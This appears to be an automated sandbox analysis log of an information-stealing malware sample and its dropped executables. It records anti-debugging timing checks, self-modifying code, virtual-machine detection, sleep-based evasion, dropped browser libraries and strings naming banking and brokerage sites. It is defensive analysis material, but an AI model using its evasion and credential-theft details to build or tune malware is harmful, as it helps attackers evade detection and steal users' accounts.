0x00000067 call 00007F5828CEC317h 0x0000006c sub dword ptr [ebp+122D1BD9h], esi 0x00000072 pop ecx 0x00000073 jmp 00007F5828CEC30Bh 0x00000078 call 00007F5828CEC309h 0x0000007d pushad 0x0000007e push eax 0x0000007f push edx 0x00000080 push ecx 0x00000081 pop ecx 0x00000082 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 1065DE9 second address: 1065DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 10783A6 second address: 10783AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 10783AA second address: 10783C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 1052C6D second address: 1052C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F5828CEC314h 0x0000000a pop esi 0x0000000b push eax 0x0000000c je 00007F5828CEC308h 0x00000012 push eax 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 108474E second address: 1084752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 1084752 second address: 1084770 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5828CEC319h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 1084770 second address: 1084785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F5828704A68h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 1084785 second address: 1084791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007F5828CEC306h 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 1084791 second address: 1084795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 1084795 second address: 10847A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jne 00007F5828CEC306h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 10847A7 second address: 10847AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 1084EA7 second address: 1084EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	RDTSC instruction interceptor: First address: 108501E second address: 1085073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5828704A74h 0x0000000a pushad 0x0000000b jmp 00007F5828704A6Ah 0x00000010 jmp 00007F5828704A72h 0x00000015 jmp 00007F5828704A79h 0x0000001a popad 0x0000001b popad 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Special instruction interceptor: First address: 7BEAFA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Special instruction interceptor: First address: 984C06 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Special instruction interceptor: First address: 9E4D47 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: B8EAFA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: D54C06 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Special instruction interceptor: First address: 1116B2D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: DB4D47 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 906B2D instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe

Code function: 5_2_04F80A26 rdtsc

5_2_04F80A26

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 360
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 371

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

API coverage: 7.5 %

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8064	Thread sleep count: 73 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8064	Thread sleep time: -146073s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8052	Thread sleep count: 63 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8052	Thread sleep time: -126063s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7652	Thread sleep count: 360 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7652	Thread sleep time: -10800000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8028	Thread sleep count: 40 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8028	Thread sleep time: -80040s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8060	Thread sleep count: 54 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8060	Thread sleep time: -108054s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6620	Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7652	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 180	Thread sleep count: 62 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 180	Thread sleep time: -124062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5500	Thread sleep count: 67 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5500	Thread sleep time: -134067s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7660	Thread sleep count: 371 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7660	Thread sleep time: -11130000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5036	Thread sleep count: 57 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5036	Thread sleep time: -114057s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1440	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5720	Thread sleep count: 45 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5720	Thread sleep time: -90045s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1964	Thread sleep count: 50 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1964	Thread sleep time: -100050s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7660	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_004139B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040E270
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00401710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_004143F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	0_2_00414050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_004133C0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00401160 GetSystemInfo,ExitProcess,

0_2_00401160

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: Amcache.hve.13.dr	Binary or memory string: VMware
Source: axplong.exe, 00000014.00000002.3277275647.00000000007DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW)F
Source: BGIJDGCA.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: BGIJDGCA.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: BGIJDGCA.0.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.13.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2443461235.0000000002736000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000013.00000002.3285409912.000000000144B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000014.00000002.3277275647.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000014.00000002.3277275647.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002765000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002739000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2794491755.0000016DCE920000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3282835116.00000221E1E3A000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 0000002C.00000002.2900300016.000000000251D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: firefox.exe, 00000028.00000002.3296660435.00000221E2219000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: BGIJDGCA.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.13.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: firefox.exe, 00000028.00000002.3282835116.00000221E1E3A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: BGIJDGCA.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Amcache.hve.13.dr	Binary or memory string: vmci.sys
Source: BGIJDGCA.0.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: BGIJDGCA.0.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: BGIJDGCA.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: BGIJDGCA.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: BGIJDGCA.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 48f0ec6733.exe, 0000002C.00000002.2899871505.00000000024B0000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: BGIJDGCA.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.13.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: firefox.exe, 00000028.00000002.3299885404.00000221E2640000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: BGIJDGCA.0.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: BGIJDGCA.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.13.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: RoamingCBFCFBFBFB.exe, RoamingCBFCFBFBFB.exe, 00000005.00000002.2284013109.000000000093C000.00000040.00000001.01000000.00000009.sdmp, RoamingIJDGCAEBFI.exe, RoamingIJDGCAEBFI.exe, 00000008.00000002.2308007629.000000000106A000.00000040.00000001.01000000.0000000B.sdmp, axplong.exe, axplong.exe, 00000009.00000002.2310490421.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp, axplong.exe, 0000000A.00000002.2310162884.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000E.00000002.2338932690.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 0000000F.00000002.2339600166.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000013.00000002.3274900167.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000014.00000002.3281696216.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: BGIJDGCA.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr	Binary or memory string: VMware, Inc.
Source: BGIJDGCA.0.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: explorti.exe, 00000013.00000002.3285409912.0000000001419000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: BGIJDGCA.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 48f0ec6733.exe, 0000002C.00000002.2900300016.00000000024CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx3R
Source: 48f0ec6733.exe, 0000002C.00000002.2899871505.00000000024B0000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware }!
Source: Amcache.hve.13.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: BGIJDGCA.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 48f0ec6733.exe, 0000002C.00000002.2900300016.000000000251D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: BGIJDGCA.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: BGIJDGCA.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: BGIJDGCA.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.13.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: BGIJDGCA.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: BGIJDGCA.0.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: BGIJDGCA.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.13.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: firefox.exe, 00000028.00000002.3299885404.00000221E2640000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3293336101.0000022B019F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: BGIJDGCA.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: BGIJDGCA.0.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: BGIJDGCA.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: BGIJDGCA.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.13.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin`
Source: BGIJDGCA.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.13.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: firefox.exe, 0000002D.00000002.3293336101.0000022B019F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWM
Source: BGIJDGCA.0.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: firefox.exe, 00000021.00000003.2794491755.0000016DCE8D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: Amcache.hve.13.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: BGIJDGCA.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Amcache.hve.13.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: RoamingCBFCFBFBFB.exe, 00000005.00000002.2284013109.000000000093C000.00000040.00000001.01000000.00000009.sdmp, RoamingIJDGCAEBFI.exe, 00000008.00000002.2308007629.000000000106A000.00000040.00000001.01000000.0000000B.sdmp, axplong.exe, 00000009.00000002.2310490421.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp, axplong.exe, 0000000A.00000002.2310162884.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000E.00000002.2338932690.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 0000000F.00000002.2339600166.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000013.00000002.3274900167.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000014.00000002.3281696216.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: BGIJDGCA.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-72647
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-72650
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-73825
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-72661
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-72690
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-72668
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-72669
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-72489

Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe

System information queried: ModuleInformation

Jump to behavior

